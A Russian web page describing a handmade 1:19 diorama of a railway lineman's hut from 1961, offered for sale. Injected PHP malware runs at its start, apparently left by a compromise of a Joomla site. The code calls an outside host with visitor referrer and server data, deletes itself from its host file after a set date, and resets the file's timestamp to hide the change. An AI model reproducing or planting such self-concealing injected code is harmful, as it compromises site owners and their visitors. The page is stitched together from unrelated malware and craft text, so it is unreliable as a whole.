check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732116){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Д.Е.П.О.

Место действия: Угловка, Новгородская область, Окуловский район, Россия.
Масштаб: 1:19
Материалы: картон, дерево, фаянс, жесть, хлопок, конопля, акварель.
Свет: есть
Статус: в продаже (3 500 руб)

Д.Е.П.О. – Дом Евграфа, путевого обходчика. Сколько таких вот неказистых домиков было разбросано по "переплетению железных дорог нашей родины"! Сколько таких Евграфов проверяло состояние путей, по которым мчались поезда. Кстати, сегодня профессия путевого обходчика почти исчезла. Этот дом – из прошлого, ведь недаром на столе у Евграфа – свежий номер газеты “Правда" с заголовком "Человек в космосе" и белозубым портретом Гагарина. Это апрель, 1961 год. Весна, капель и солнце перемежаются напоследок лютыми метелями.
Его сторожка небрежно крыта порыжевшей соломой, а быт устроен совсем нехитро. Евграф спит на топчане за печкой, положив голову на красную подушку в белоснежной наволочке.
Казалось бы, живет он замкнуто, но кое-кто к нему в гости наведывается: на окнах - чистые кружевные занавески, а одеяло из лоскутков сшито с большой любовью. Кстати, счастье Евграфу приносит подкова над дверью – по старинной примете. А все свои рабочие причиндалы – лопату и метлу, сигнальные флажки и оранжевый жилет обходчика – Евграф бережет как зеницу ока.
Так он и живет, читая вечерами газеты, топит печку, убирает снег, да порой ездит в город за новой лампочкой взамен перегоревшей. Ну и за цветастым полушалочком заодно!..

.